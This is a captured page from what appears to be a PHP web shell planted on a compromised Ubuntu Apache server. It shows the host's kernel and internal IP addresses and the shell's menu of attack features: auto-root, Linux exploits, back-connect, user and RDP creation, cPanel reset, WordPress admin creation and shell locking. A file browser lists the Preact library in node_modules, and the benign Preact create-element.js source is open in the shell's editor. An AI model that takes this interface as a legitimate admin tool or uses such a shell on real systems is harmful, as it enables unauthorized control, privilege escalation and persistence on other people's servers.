Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
preact /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
diff
[ DIR ]
drwxrwxr-x
cjs.js
115
B
-rw-rw-r--
clone-element.js
1.13
KB
-rw-rw-r--
component.js
7.75
KB
-rw-rw-r--
constants.js
701
B
-rw-rw-r--
create-context.js
2.15
KB
-rw-rw-r--
create-element.js
2.91
KB
-rw-rw-r--
index.d.ts
10.75
KB
-rw-rw-r--
index.js
408
B
-rw-rw-r--
internal.d.ts
6.03
KB
-rw-rw-r--
jsx.d.ts
99.48
KB
-rw-rw-r--
options.js
566
B
-rw-rw-r--
render.js
2.35
KB
-rw-rw-r--
util.js
911
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : create-element.js
import { slice } from './util'; import options from './options'; let vnodeId = 0; /** * Create an virtual node (used for JSX) * @param {VNode["type"]} type The node name or Component constructor for this * virtual node * @param {object | null | undefined} [props] The properties of the virtual node * @param {Array<import('.').ComponentChildren>} [children] The children of the * virtual node * @returns {VNode} */ export function createElement(type, props, children) { let normalizedProps = {}, key, ref, i; for (i in props) { if (i == 'key') key = props[i]; else if (i == 'ref') ref = props[i]; else normalizedProps[i] = props[i]; } if (arguments.length > 2) { normalizedProps.children = arguments.length > 3 ? slice.call(arguments, 2) : children; } // If a Component VNode, check for and apply defaultProps // Note: type may be undefined in development, must never error here. if (typeof type == 'function' && type.defaultProps != null) { for (i in type.defaultProps) { if (normalizedProps[i] === undefined) { normalizedProps[i] = type.defaultProps[i]; } } } return createVNode(type, normalizedProps, key, ref, null); } /** * Create a VNode (used internally by Preact) * @param {VNode["type"]} type The node name or Component * Constructor for this virtual node * @param {object | string | number | null} props The properties of this virtual node. * If this virtual node represents a text node, this is the text of the node (string or number). * @param {string | number | null} key The key for this virtual node, used when * diffing it against its children * @param {VNode["ref"]} ref The ref property that will * receive a reference to its created child * @returns {VNode} */ export function createVNode(type, props, key, ref, original) { // V8 seems to be better at detecting type shapes if the object is allocated from the same call site // Do not inline into createElement and coerceToVNode! /** @type {VNode} */ const vnode = { type, props, key, ref, _children: null, _parent: null, _depth: 0, _dom: null, // _nextDom must be initialized to undefined b/c it will eventually // be set to dom.nextSibling which can return `null` and it is important // to be able to distinguish between an uninitialized _nextDom and // a _nextDom that has been set to `null` _nextDom: undefined, _component: null, constructor: undefined, _original: original == null ? ++vnodeId : original, _index: -1, _flags: 0 }; // Only invoke the vnode hook if this was *not* a direct copy: if (original == null && options.vnode != null) options.vnode(vnode); return vnode; } export function createRef() { return { current: null }; } export function Fragment(props) { return props.children; } /** * Check if a the argument is a valid Preact VNode. * @param {*} vnode * @returns {vnode is VNode} */ export const isValidElement = vnode => vnode != null && vnode.constructor == undefined;
Close